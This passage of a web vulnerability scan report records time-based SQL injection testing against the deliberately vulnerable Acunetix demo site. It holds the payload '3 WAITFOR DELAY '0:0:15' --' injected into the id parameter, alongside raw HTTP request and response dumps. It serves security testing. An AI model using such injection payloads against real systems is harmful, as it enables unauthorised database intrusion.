Request Body - size: 1,381 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk%2FTUy&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKDytHbBQKAgcfvBQKFzrr8AQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDelgcSNkQi9b3oGhQR0IdatoEdv&tbComment=hvEYyWNN&btnSend=Send+comment
Response Header - size: 178 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:47:08 GMT
Response Body - size: 0 bytes.
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Method	POST
Parameter	id
Attack	3 WAITFOR DELAY '0:0:15' --
Evidence
Show / hide Request and Response
Request Header - size: 456 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3+WAITFOR+DELAY+%270%3A0%3A15%27+--+ HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 Content-Length: 3743 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 3,743 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9M2RkAgsPFgIeA3NyY2RkZNGFyTb9L%2FR3K%2BNgG4eTH6G64d5v&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKblqunCgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBEMuJR47%2F37fBoWsDm%2B8pRHDKDZX
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:47:26 GMT Content-Length: 18105
Response Body - size: 18,105 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3+WAITFOR+DELAY+'0%3a0%3a15'+--+" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFLUNvbW1lbnRzLmFzcHg/aWQ9MyBXQUlURk9SIERFTEFZICcwOjA6MTUnIC0tIGRkAgsPFgIeA3NyY2RkZL6bDx4ZrphaXF3348iX5rzRjohh" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLz7PKhDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBONzuIVHetk6FHK+CmQ5LQDhHInX" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3 WAITFOR DELAY '0:0:15' -- ">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
Instances	6
